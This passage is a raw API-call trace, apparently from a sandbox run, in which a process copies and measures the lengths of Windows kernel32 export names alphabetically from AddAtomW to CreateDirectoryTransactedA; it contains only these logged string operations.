lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.754] lstrlenA (lpString="ADDATOMW") returned 8 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.754] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.754] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.754] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.754] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.754] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.754] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.754] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.754] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.754] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.754] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.754] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.754] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.754] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.755] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.755] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.755] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.755] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.755] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.755] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.755] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.755] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.755] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.755] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.755] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.755] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.755] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.755] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.755] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.755] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.755] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.755] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.755] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.756] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.756] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.756] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.756] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.756] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.756] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.756] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.756] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.756] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.756] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.756] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.756] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.756] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.756] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.756] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.756] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.756] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.756] lstrlenA (lpString="BEEP") returned 4 [0087.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.756] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.757] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.757] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.757] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.757] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.757] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.757] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.757] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.757] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.757] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.757] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.757] lstrlenA (lpString="CANCELIO") returned 8 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.757] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.757] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.757] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.757] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.757] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.757] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.757] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.757] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.758] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.758] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.758] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.758] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.758] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.758] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.758] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.758] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.758] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.758] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.758] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.758] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.758] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.758] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.759] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.759] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.759] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.759] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.759] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.759] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.759] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.759] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.759] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.759] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.759] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.759] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.759] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.759] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.759] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.759] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.759] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.759] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.759] lstrlenA (lpString="COPYFILEA") returned 9 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.760] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.760] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.760] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.760] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.760] lstrlenA (lpString="COPYFILEW") returned 9 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.760] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.760] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.760] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.760] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.760] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.760] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.760] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.760] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.760] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.760] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" 